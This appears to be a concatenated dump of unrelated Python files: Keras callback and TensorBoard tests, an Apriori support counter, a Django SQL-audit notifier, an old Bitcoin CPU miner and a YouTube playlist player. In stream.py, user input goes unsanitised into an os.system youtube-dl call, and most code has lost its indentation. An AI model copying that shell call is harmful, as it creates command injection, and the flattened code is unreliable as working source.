NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='sgd',
metrics=['accuracy'])
# Start an arbitrary process that should run during model
# training and be terminated after training has completed.
e = threading.Event()
def target():
e.wait()
t = threading.Thread(target=target)
t.start()
cleanup_callback = keras.callbacks.LambdaCallback(
on_train_end=lambda logs: e.set())
cbks = [cleanup_callback]
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=5,
verbose=0)
t.join()
assert not t.is_alive()
def test_RemoteMonitorWithJsonPayload(self):
if requests is None:
self.skipTest('`requests` required to run this test')
with self.cached_session():
(x_train, y_train), (x_test, y_test) = testing_utils.get_test_data(
train_samples=TRAIN_SAMPLES,
test_samples=TEST_SAMPLES,
input_shape=(INPUT_DIM,),
num_classes=NUM_CLASSES)
y_test = keras.utils.np_utils.to_categorical(y_test)
y_train = keras.utils.np_utils.to_categorical(y_train)
model = keras.models.Sequential()
model.add(
keras.layers.Dense(
NUM_HIDDEN, input_dim=INPUT_DIM, activation='relu'))
model.add(keras.layers.Dense(NUM_CLASSES, activation='softmax'))
model.compile(
loss='categorical_crossentropy',
optimizer='rmsprop',
metrics=['accuracy'])
cbks = [keras.callbacks.RemoteMonitor(send_as_json=True)]
with test.mock.patch.object(requests, 'post'):
model.fit(
x_train,
y_train,
batch_size=BATCH_SIZE,
validation_data=(x_test, y_test),
callbacks=cbks,
epochs=1)
# A summary that was emitted during a test. Fields:
# logdir: str. The logdir of the FileWriter to which the summary was
# written.
# tag: str. The name of the summary.
_ObservedSummary = collections.namedtuple('_ObservedSummary', ('logdir', 'tag'))
class _SummaryFile(object):
"""A record of summary tags and the files to which they were written.
Fields `scalars`, `images`, `histograms`, and `tensors` are sets
containing `_ObservedSummary` values.
"""
def __init__(self):
self.scalars = set()
self.images = set()
self.histograms = set()
self.tensors = set()
def list_summaries(logdir):
"""Read all summaries under the logdir into a `_SummaryFile`.
Args:
logdir: A path to a directory that contains zero or more event
files, either as direct children or in transitive subdirectories.
Summaries in these events must only contain old-style scalars,
images, and histograms. Non-summary events, like `graph_def`s, are
ignored.
Returns:
A `_SummaryFile` object reflecting all summaries written to any
event files in the logdir or any of its descendant directories.
Raises:
ValueError: If an event file contains a summary of unexpected kind.
"""
result = _SummaryFile()
for (dirpath, dirnames, filenames) in os.walk(logdir):
del dirnames # unused
for filename in filenames:
if not filename.startswith('events.out.'):
continue
path = os.path.join(dirpath, filename)
for event in summary_iterator.summary_iterator(path):
if not event.summary: # (e.g., it's a `graph_def` event)
continue
for value in event.summary.value:
tag = value.tag
# Case on the `value` rather than the summary metadata because
# the Keras callback uses `summary_ops_v2` to emit old-style
# summaries. See b/124535134.
kind = value.WhichOneof('value')
container = {
'simple_value': result.scalars,
'image': result.images,
'histo': result.histograms,
'tensor': result.tensors,
}.get(kind)
if container is None:
raise ValueError(
'Unexpected summary kind %r in event file %s:\n%r'
% (kind, path, event))
container.add(_ObservedSummary(logdir=dirpath, tag=tag))
return result
@keras_parameterized.run_with_all_model_types
@keras_parameterized.run_all_keras_modes(always_skip_v1=True)
class TestTensorBoardV2(keras_parameterized.TestCase):
def setUp(self):
super(TestTensorBoardV2, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def _get_model(self):
layers = [
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1)
]
model = testing_utils.get_model_from_layers(layers, input_shape=(10, 10, 1))
model.compile('sgd', 'mse', run_eagerly=testing_utils.should_run_eagerly())
return model
def test_TensorBoard_default_logdir(self):
"""Regression test for cross-platform pathsep in default logdir."""
os.chdir(self.get_temp_dir())
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard() # no logdir specified
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(logdir='.')
train_dir = os.path.join('.', 'logs', 'train')
validation_dir = os.path.join('.', 'logs', 'validation')
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_basic(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_across_invocations(self):
"""Regression test for summary writer resource use-after-free.
See: <https://github.com/tensorflow/tensorflow/issues/25707>
"""
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir)
for _ in (1, 2):
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars, {
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
})
def test_TensorBoard_batch_metrics(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, update_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='batch_loss'),
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
def test_TensorBoard_weight_histograms(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, histogram_freq=1)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
def test_TensorBoard_weight_images(self):
model = self._get_model()
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(
self.logdir, histogram_freq=1, write_images=True)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.scalars,
{
_ObservedSummary(logdir=self.train_dir, tag='epoch_loss'),
_ObservedSummary(logdir=self.validation_dir, tag='epoch_loss'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.histograms),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0'),
},
)
self.assertEqual(
self._strip_layer_names(summary_file.images),
{
_ObservedSummary(logdir=self.train_dir, tag='bias_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/0'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/1'),
_ObservedSummary(logdir=self.train_dir, tag='kernel_0/image/2'),
},
)
def _strip_layer_names(self, summaries):
"""Deduplicate summary names modulo layer prefix.
This removes the first slash-component of each tag name: for
instance, "foo/bar/baz" becomes "bar/baz".
Args:
summaries: A `set` of `_ObservedSummary` values.
Returns:
A new `set` of `_ObservedSummary` values with layer prefixes
removed.
"""
result = set()
for summary in summaries:
if '/' not in summary.tag:
raise ValueError('tag has no layer name: %r' % summary.tag)
new_tag = summary.tag.split('/', 1)[1]
result.add(summary._replace(tag=new_tag))
return result
def test_TensorBoard_invalid_argument(self):
with self.assertRaisesRegexp(ValueError, 'Unrecognized arguments'):
keras.callbacks.TensorBoard(wwrite_images=True)
# Note that this test specifies model_type explicitly.
class TestTensorBoardV2WriteModelTest(test.TestCase):
def setUp(self):
super(TestTensorBoardV2WriteModelTest, self).setUp()
self.logdir = os.path.join(self.get_temp_dir(), 'tb')
self.train_dir = os.path.join(self.logdir, 'train')
self.validation_dir = os.path.join(self.logdir, 'validation')
def fitModelAndAssertKerasModelWritten(self, model):
x, y = np.ones((10, 10, 10, 1)), np.ones((10, 1))
tb_cbk = keras.callbacks.TensorBoard(self.logdir, write_graph=True)
model.fit(
x,
y,
batch_size=2,
epochs=2,
validation_data=(x, y),
callbacks=[tb_cbk])
summary_file = list_summaries(self.logdir)
self.assertEqual(
summary_file.tensors,
{
_ObservedSummary(logdir=self.train_dir, tag='keras'),
},
)
def test_TensorBoard_writeSequentialModel_noInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeSequentialModel_withInputShape(self):
model = keras.models.Sequential([
keras.layers.Conv2D(8, (3, 3), input_shape=(10, 10, 1)),
keras.layers.Flatten(),
keras.layers.Dense(1),
])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
def test_TensorBoard_writeModel(self):
inputs = keras.layers.Input([10, 10, 1])
x = keras.layers.Conv2D(8, (3, 3), activation='relu')(inputs)
x = keras.layers.Flatten()(x)
x = keras.layers.Dense(1)(x)
model = keras.models.Model(inputs=inputs, outputs=[x])
model.compile('sgd', 'mse', run_eagerly=False)
self.fitModelAndAssertKerasModelWritten(model)
if __name__ == '__main__':
test.main()
|
GroundTruth.py
|
'''
Calculate ground truth with standard Apriori algorithm
'''
from collections import defaultdict
from models.DataSet import SeqDataSet,Trajectory
from utils.Naming import SupportCountPickleName
import pickle
import multiprocess
import math
from utils.Print import printRound
from models.Apriori import *
def generateCandidates(fragment,util):
res = []
for a in fragment:
for b in fragment:
link = util.linker(a,b)
allowed = []
for li in link:
flag = True
subs = util.sub(li)
for s in subs:
if s not in fragment:
flag = False
break
if flag is True:
allowed.append(li)
res += allowed
return res
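# A minimal, self-contained sketch of the same Apriori join-and-prune idea on
# plain tuples (a hypothetical standalone helper, not part of this module):
# join two frequent (k-1)-fragments that overlap, then keep a candidate only
# if every (k-1)-subfragment is itself frequent, which is what
# generateCandidates above delegates to util.linker and util.sub.
def _apriori_candidates_sketch(frequent_fragments):
    frequent = set(frequent_fragments)
    candidates = []
    for a in frequent:
        for b in frequent:
            if a[1:] == b[:-1]:  # join step: ('A','B') + ('B','C') -> ('A','B','C')
                cand = a + b[-1:]
                subs = [cand[:i] + cand[i + 1:] for i in range(len(cand))]
                if all(s in frequent for s in subs):  # prune step
                    candidates.append(cand)
    return candidates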
def ground_truth_worker(dataset,process_idx,candidates,participants,queue,verbose):
    num_milestone = 5
    milestone = math.floor(len(participants)/num_milestone)
    local_support_count = defaultdict(lambda : 0)
    for idx in range(len(participants)):
        if idx > 0 and idx % milestone == 0 and verbose:
            print("Worker %2d: %d%% done" % (process_idx,int(round(idx*100/len(participants)))))
        client_idx = participants[idx]
for candi in candidates:
if dataset[client_idx].checkSub(candi) is True:
local_support_count[candi] += 1
queue.put(local_support_count)
if verbose:
print("Worker %2d: all done" % process_idx)
return
def groundTruth(dataset,args):
if args.pattern_type == 'sequence':
util = seqUtils()
elif args.pattern_type == 'itemset':
util = itemUtils()
elif args.pattern_type == 'item':
util = hitterUtils()
k = int(args.k/args.duplicate)
traj_num = dataset.get_line_num()
frag_len = 0
res = {}
# longer fragments
while True:
frag_len += 1
printRound(frag_len)
if frag_len == 1:
candidates = dataset.init_candidate()
else:
candidates = generateCandidates(fragments,util)
print("%d-fragments: %d candidates" % (frag_len,len(candidates)))
if len(candidates) == 0:
print('Terminal')
return res
support_count = defaultdict(lambda : 0)
if args.process <= 0:
for traj_idx in range(traj_num):
traj = dataset.get_trajectory(traj_idx)
for candi in candidates:
if traj.checkSubSeq(candi) is True:
support_count[candi] += 1
if traj_idx % 10000 == 0 and args.verbose:
print("%d trajectories checked" % traj_idx)
else:
            manager = multiprocess.Manager()
            queue = manager.Queue()
jobs = []
workload = math.floor(traj_num/args.process)
for proc_idx in range(args.process):
if proc_idx == args.process - 1:
                    participants_load = list(range(proc_idx*workload,traj_num))
                else:
                    participants_load = list(range(proc_idx*workload,(proc_idx+1)*workload))
                p = multiprocess.Process(target=ground_truth_worker,args=(dataset,proc_idx,candidates,participants_load,queue,args.verbose))
jobs.append(p)
p.start()
for p in jobs:
p.join()
if args.verbose:
print("Aggregating...")
proc_results = [queue.get() for j in jobs]
for proc_res in proc_results:
for key,value in proc_res.items():
support_count[key] += value
fragments = [key for key,value in support_count.items() if value >= k]
for key,value in support_count.items():
if value >= k:
res[key] = value
print("%d-fragments: %d admitted" % (frag_len,len(fragments)))
|
notify.py
|
# -*- coding: UTF-8 -*-
import datetime
import re
import traceback
from threading import Thread
from django.contrib.auth.models import Group
from sql.models import QueryPrivilegesApply, Users, SqlWorkflow, SqlGroup, WorkflowAudit, WorkflowAuditDetail
from common.config import SysConfig
from sql.utils.group import auth_group_users
from common.utils.sendmsg import MailSender
from common.utils.const import WorkflowDict
import logging
logger = logging.getLogger('default')
# Mail/message notification. msg_type: 0 = all channels, 1 = email only, 2 = DingTalk only
def _send(audit_id, msg_type, **kwargs):
msg_sender = MailSender()
sys_config = SysConfig().sys_config
audit_info = WorkflowAudit.objects.get(audit_id=audit_id)
workflow_id = audit_info.workflow_id
workflow_type = audit_info.workflow_type
status = audit_info.current_status
workflow_title = audit_info.workflow_title
workflow_from = audit_info.create_user_display
workflow_url = kwargs.get('workflow_url')
webhook_url = SqlGroup.objects.get(group_id=audit_info.group_id).ding_webhook
audit_info = WorkflowAudit.objects.get(workflow_id=workflow_id, workflow_type=workflow_type)
if audit_info.audit_auth_groups == '':
workflow_auditors = '无需审批'
else:
try:
workflow_auditors = '->'.join([Group.objects.get(id=auth_group_id).name for auth_group_id in
audit_info.audit_auth_groups.split(',')])
except Exception:
workflow_auditors = audit_info.audit_auth_groups
if audit_info.current_audit == '-1':
current_workflow_auditors = None
else:
try:
current_workflow_auditors = Group.objects.get(id=audit_info.current_audit).name
except Exception:
current_workflow_auditors = audit_info.current_audit
    # Prepare the message content
if workflow_type == WorkflowDict.workflow_type['query']:
workflow_type_display = WorkflowDict.workflow_type['query_display']
workflow_detail = QueryPrivilegesApply.objects.get(apply_id=workflow_id)
try:
workflow_audit_remark = WorkflowAuditDetail.objects.filter(audit_id=audit_id).latest('audit_time').remark
except Exception:
workflow_audit_remark = ''
if workflow_detail.priv_type == 1:
workflow_content = '''数据库清单:{}\n授权截止时间:{}\n结果集:{}\n'''.format(
workflow_detail.db_list,
datetime.datetime.strftime(workflow_detail.valid_date, '%Y-%m-%d %H:%M:%S'),
workflow_detail.limit_num)
elif workflow_detail.priv_type == 2:
workflow_content = '''数据库:{}\n表清单:{}\n授权截止时间:{}\n结果集:{}\n'''.format(
workflow_detail.db_list,
workflow_detail.table_list,
datetime.datetime.strftime(workflow_detail.valid_date, '%Y-%m-%d %H:%M:%S'),
workflow_detail.limit_num)
elif workflow_type == WorkflowDict.workflow_type['sqlreview']:
workflow_type_display = WorkflowDict.workflow_type['sqlreview_display']
workflow_detail = SqlWorkflow.objects.get(pk=workflow_id)
workflow_audit_remark = workflow_detail.audit_remark
workflow_content = re.sub('[\r\n\f]{2,}', '\n', workflow_detail.sql_content[0:500].replace('\r', ''))
else:
raise Exception('工单类型不正确')
    # Prepare the message format
    if status == WorkflowDict.workflow_status['audit_wait']:  # application submitted
msg_title = "[{}]新的工单申请#{}".format(workflow_type_display, audit_id)
        # Recipients: every user in the relevant permission group of this resource group
auth_group_names = Group.objects.get(id=audit_info.current_audit).name
msg_email_reciver = [user.email for user in
auth_group_users([auth_group_names], audit_info.group_id)]
        # CC recipients
email_cc = kwargs.get('email_cc', [])
msg_email_cc = email_cc
msg_content = '''发起人:{}\n审批流程:{}\n当前审批:{}\n工单名称:{}\n工单地址:{}\n工单详情预览:{}\n'''.format(
workflow_from,
workflow_auditors,
current_workflow_auditors,
workflow_title,
workflow_url,
workflow_content)
    elif status == WorkflowDict.workflow_status['audit_success']:  # audit passed
msg_title = "[{}]工单审核通过#{}".format(workflow_type_display, audit_id)
        # Recipients
msg_email_reciver = [Users.objects.get(username=audit_info.create_user).email]
        # CC recipients
msg_email_cc = kwargs.get('email_cc', [])
msg_content = '''发起人:{}\n审批流程:{}\n工单名称:{}\n工单地址:{}\n工单详情预览:{}\n'''.format(
workflow_from,
workflow_auditors,
workflow_title,
workflow_url,
workflow_content)
    elif status == WorkflowDict.workflow_status['audit_reject']:  # audit rejected
msg_title = "[{}]工单被驳回#{}".format(workflow_type_display, audit_id)
        # Recipients
msg_email_reciver = [Users.objects.get(username=audit_info.create_user).email]
msg_email_cc = []
msg_content = '''工单名称:{}\n工单地址:{}\n驳回原因:{}\n提醒:此工单被审核不通过,请按照驳回原因进行修改!'''.format(
workflow_title,
workflow_url,
workflow_audit_remark)
    elif status == WorkflowDict.workflow_status['audit_abort']:  # cancelled by the submitter, notify all auditors
msg_title = "[{}]提交人主动终止工单#{}".format(workflow_type_display, audit_id)
        # Recipients: every user in the relevant permission group of this resource group
auth_group_names = [Group.objects.get(id=auth_group_id).name for auth_group_id in
audit_info.audit_auth_groups.split(',')]
msg_email_reciver = [user.email for user in auth_group_users(auth_group_names, audit_info.group_id)]
msg_email_cc = []
msg_content = '''发起人:{}\n工单名称:{}\n工单地址:{}\n提醒:提交人主动终止流程'''.format(
workflow_from,
workflow_title,
workflow_url)
else:
raise Exception('工单状态不正确')
if isinstance(msg_email_reciver, str):
msg_email_reciver = [msg_email_reciver]
if isinstance(msg_email_cc, str):
msg_email_cc = [msg_email_cc]
    # Decide whether to send a DingTalk message, an email, or both
if msg_type == 0:
if sys_config.get('mail'):
msg_sender.send_email(msg_title, msg_content, msg_email_reciver, listCcAddr=msg_email_cc)
if sys_config.get('ding'):
msg_sender.send_ding(webhook_url, msg_title + '\n' + msg_content)
if msg_type == 1 and sys_config.get('mail'):
msg_sender.send_email(msg_title, msg_content, msg_email_reciver, listCcAddr=msg_email_cc)
elif msg_type == 2 and sys_config.get('ding'):
msg_sender.send_ding(webhook_url, msg_title + '\n' + msg_content)
# Asynchronous call in a background thread
def send_msg(audit_id, msg_type, **kwargs):
logger.debug('异步发送消息通知')
p = Thread(target=_send, args=(audit_id, msg_type), kwargs=kwargs)
p.start()
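# Hedged usage sketch (the audit id and URL below are placeholders): queue a
# notification for audit 123 in a background thread; msg_type=0 sends both
# email and DingTalk, subject to the 'mail'/'ding' switches in SysConfig.
#   send_msg(123, 0, workflow_url='https://archery.example.com/workflow/123/',
#            email_cc=['dba@example.com'])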
|
pyminer.py
|
#!/usr/bin/python
#
# Copyright (c) 2011 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import time
import json
import pprint
import hashlib
import struct
import re
import base64
import httplib
import sys
from multiprocessing import Process
ERR_SLEEP = 15
MAX_NONCE = 1000000L
settings = {}
pp = pprint.PrettyPrinter(indent=4)
class BitcoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblockcount(self):
return self.rpc('getblockcount')
def getwork(self, data=None):
return self.rpc('getwork', data)
def uint32(x):
return x & 0xffffffffL
def bytereverse(x):
return uint32(( ((x) << 24) | (((x) << 8) & 0x00ff0000) |
(((x) >> 8) & 0x0000ff00) | ((x) >> 24) ))
def bufreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
word = struct.unpack('@I', in_buf[i:i+4])[0]
out_words.append(struct.pack('@I', bytereverse(word)))
return ''.join(out_words)
def wordreverse(in_buf):
out_words = []
for i in range(0, len(in_buf), 4):
out_words.append(in_buf[i:i+4])
out_words.reverse()
return ''.join(out_words)
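# Quick sanity check of the byte-order helpers above (illustrative values, on a
# little-endian host): bytereverse() swaps the four bytes of a 32-bit word and
# bufreverse() applies that swap to every 4-byte word of a buffer.
#   bytereverse(0x12345678) == 0x78563412
#   bufreverse('\x01\x02\x03\x04\x05\x06\x07\x08') == '\x04\x03\x02\x01\x08\x07\x06\x05'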
class Miner:
def __init__(self, id):
self.id = id
self.max_nonce = MAX_NONCE
def work(self, datastr, targetstr):
# decode work data hex string to binary
static_data = datastr.decode('hex')
static_data = bufreverse(static_data)
# the first 76b of 80b do not change
blk_hdr = static_data[:76]
# decode 256-bit target value
targetbin = targetstr.decode('hex')
targetbin = targetbin[::-1] # byte-swap and dword-swap
targetbin_str = targetbin.encode('hex')
target = long(targetbin_str, 16)
# pre-hash first 76b of block header
static_hash = hashlib.sha256()
static_hash.update(blk_hdr)
for nonce in xrange(self.max_nonce):
# encode 32-bit nonce value
nonce_bin = struct.pack("<I", nonce)
# hash final 4b, the nonce value
hash1_o = static_hash.copy()
hash1_o.update(nonce_bin)
hash1 = hash1_o.digest()
# sha256 hash of sha256 hash
hash_o = hashlib.sha256()
hash_o.update(hash1)
hash = hash_o.digest()
# quick test for winning solution: high 32 bits zero?
if hash[-4:] != '\0\0\0\0':
continue
# convert binary hash to 256-bit Python long
hash = bufreverse(hash)
hash = wordreverse(hash)
hash_str = hash.encode('hex')
l = long(hash_str, 16)
# proof-of-work test: hash < target
if l < target:
print time.asctime(), "PROOF-OF-WORK found: %064x" % (l,)
return (nonce + 1, nonce_bin)
else:
print time.asctime(), "PROOF-OF-WORK false positive %064x" % (l,)
# return (nonce + 1, nonce_bin)
return (nonce + 1, None)
def submit_work(self, rpc, original_data, nonce_bin):
nonce_bin = bufreverse(nonce_bin)
nonce = nonce_bin.encode('hex')
solution = original_data[:152] + nonce + original_data[160:256]
param_arr = [ solution ]
result = rpc.getwork(param_arr)
print time.asctime(), "--> Upstream RPC result:", result
def iterate(self, rpc):
work = rpc.getwork()
if work is None:
time.sleep(ERR_SLEEP)
return
if 'data' not in work or 'target' not in work:
time.sleep(ERR_SLEEP)
return
time_start = time.time()
(hashes_done, nonce_bin) = self.work(work['data'],
work['target'])
time_end = time.time()
time_diff = time_end - time_start
self.max_nonce = long(
(hashes_done * settings['scantime']) / time_diff)
if self.max_nonce > 0xfffffffaL:
self.max_nonce = 0xfffffffaL
if settings['hashmeter']:
print "HashMeter(%d): %d hashes, %.2f Khash/sec" % (
self.id, hashes_done,
(hashes_done / 1000.0) / time_diff)
if nonce_bin is not None:
self.submit_work(rpc, work['data'], nonce_bin)
def loop(self):
rpc = BitcoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpass'])
if rpc is None:
return
while True:
self.iterate(rpc)
def miner_thread(id):
miner = Miner(id)
miner.loop()
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: pyminer.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 5050
if 'threads' not in settings:
settings['threads'] = 1
if 'hashmeter' not in settings:
settings['hashmeter'] = 0
if 'scantime' not in settings:
settings['scantime'] = 30L
if 'rpcuser' not in settings or 'rpcpass' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['threads'] = int(settings['threads'])
settings['hashmeter'] = int(settings['hashmeter'])
settings['scantime'] = long(settings['scantime'])
thr_list = []
for thr_id in range(settings['threads']):
p = Process(target=miner_thread, args=(thr_id,))
p.start()
thr_list.append(p)
time.sleep(1) # stagger threads
print settings['threads'], "mining threads started"
print time.asctime(), "Miner Starts - %s:%s" % (settings['host'], settings['port'])
try:
for thr_proc in thr_list:
thr_proc.join()
except KeyboardInterrupt:
pass
print time.asctime(), "Miner Stops - %s:%s" % (settings['host'], settings['port'])
|
stream.py
|
import os
import time
import eel
from pygame import mixer
from mutagen.mp3 import MP3
import threading
os.system('cls')
print('')
print('example:- https://www.youtube.com/playlist?list=XYZ123ABC')
link = str(input('ENTER A YOUTUBE PLAYLIST/VIDEO LINK:- '))
print('')
with open('config.txt') as f:
Store_Temp_Streaming_Data = f.readline()
Default_Local_Music_Dir = f.readline()
dir = Store_Temp_Streaming_Data[27:][:-1]
eel.init("web") # initialises eel
arr = [] #array keeps track of all songs
i = 0
o = 0 #counter for songs
status = 1 #for play/pause status
vol = 1.0 #controls volume (1.0 = maximum volume)
def yt_dl():
try:
os.makedirs(dir)
except FileExistsError:
pass
os.chdir(dir)
os.system('youtube-dl --no-check-certificate --no-overwrites --ignore-errors --no-continue --rm-cache-dir --no-part -q --metadata-from-title "%(artist)s - %(title)s" --audio-quality 0 -x --audio-format mp3 ' + link)
# adds all songs to array
def updater():
global i
global o
try:
if i != len(os.listdir(dir)) - 3:
if os.listdir(dir)[i][-4:] == '.mp3':
if os.listdir(dir)[i] not in arr:
arr.append(os.listdir(dir)[i])
i += 1
except:
i = 0
@eel.expose
def play():
# plays music
global status
status = 1
mixer.music.unpause()
updater()
return 'play'
@eel.expose
# pauses music
def pause():
global status
status = 0
mixer.music.pause()
updater()
return 'pause'
@eel.expose
# increases volume
def vol_up():
global vol
vol += 0.1
if vol > 1.0:
vol = 1.0
mixer.music.set_volume(vol)
return str('volume: ' + str(round(vol * 100)))
@eel.expose
# decreases volume
def vol_down():
global vol
vol -= 0.1
if vol < 0.1:
vol = 0
mixer.music.set_volume(vol)
return str('volume: ' + str(round(vol * 100)))
@eel.expose
def next():
global arr
global o
global status
# if music is not paused
if status == 1:
if o + 1 != len(arr):
# loads and plays next song
try:
o += 1
mixer.music.load(dir + "\\" + arr[o])
except:
return
mixer.music.play()
updater()
return [arr[o][:-16], 'next']
        # if all songs have been played, start again from the beginning
else:
o = 0
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
updater()
return [arr[o][:-16], 'next']
# if music is paused
elif status == 0:
if o + 1 != len(arr):
# loads and plays next song
try:
o += 1
mixer.music.load(dir + "\\" + arr[o])
except:
o += 1
mixer.music.load(dir + "\\" + arr[o])
return
mixer.music.play()
mixer.music.pause()
updater()
return [arr[o][:-16], 'next']
        # if all songs have been played, start again from the beginning
else:
o = 0
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
updater()
return [arr[o][:-16], 'next']
@eel.expose
def previous():
global arr
global o
global status
# if music is not paused
if status == 1:
# loads and plays previous song
try:
o -= 1
mixer.music.load(dir + "\\" + arr[o])
except:
return
mixer.music.play()
updater()
return [arr[o][:-16], 'previous']
# if music is paused
elif status == 0:
# loads and plays previous song
try:
o -= 1
mixer.music.load(dir + "\\" + arr[o])
except:
return
mixer.music.play()
mixer.music.pause()
updater()
return [arr[o][:-16], 'previous']
@eel.expose
def main():
global arr
global o
global status
# updates the HTML header with the current playing song
eel.name_update(arr[o][:-16])
# gets song length
def length():
length = MP3(dir + "\\" + arr[o]).info.length
return int(length)
# updates song slider bar
while mixer.music.get_busy() != 0:
updater()
os.system('cls')
print('songs loaded: ', len(arr))
print('now playing: ', '#' + str(o + 1) , arr[o][:-16])
eel.time(int((((mixer.music.get_pos()) / 1000) / length()) * 100000000))
while status == 0:
updater()
os.system('cls')
print('songs loaded: ', len(arr))
print('now playing: ', '#' + str(o + 1) , arr[o][:-16])
eel.time(int((((mixer.music.get_pos()) / 1000) / length()) * 100000000))
# plays next song if song has finished
if mixer.music.get_busy() == 0:
o += 1
if o != len(arr):
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
main()
else:
o = 0
mixer.music.load(dir + "\\" + arr[o])
mixer.music.play()
main()
# Starts the index.html file
def start0():
eel.start("index.html", size=(551, 390), position=(0,0))
def init():
mixer.init()
os.system('cls')
print('loading, please be patient...')
# clears old data
dir_counter = 0
while len(os.listdir(dir)) != 3:
try:
if os.listdir(dir)[dir_counter][-3:] != 'exe':
os.remove(dir + r'//' + os.listdir(dir)[dir_counter])
dir_counter += 1
except:
dir_counter = 0
while len(arr) == 0:
updater()
# loads initial song
def loader():
time.sleep(1)
try:
mixer.music.load(dir + '\\' + arr[o])
except:
loader()
loader()
os.system('cls')
mixer.music.play()
if __name__ == '__main__':
threading.Thread(target = yt_dl).start()
init()
threading.Thread(target = main).start()
start0()
|
generate_wx_data.py
|
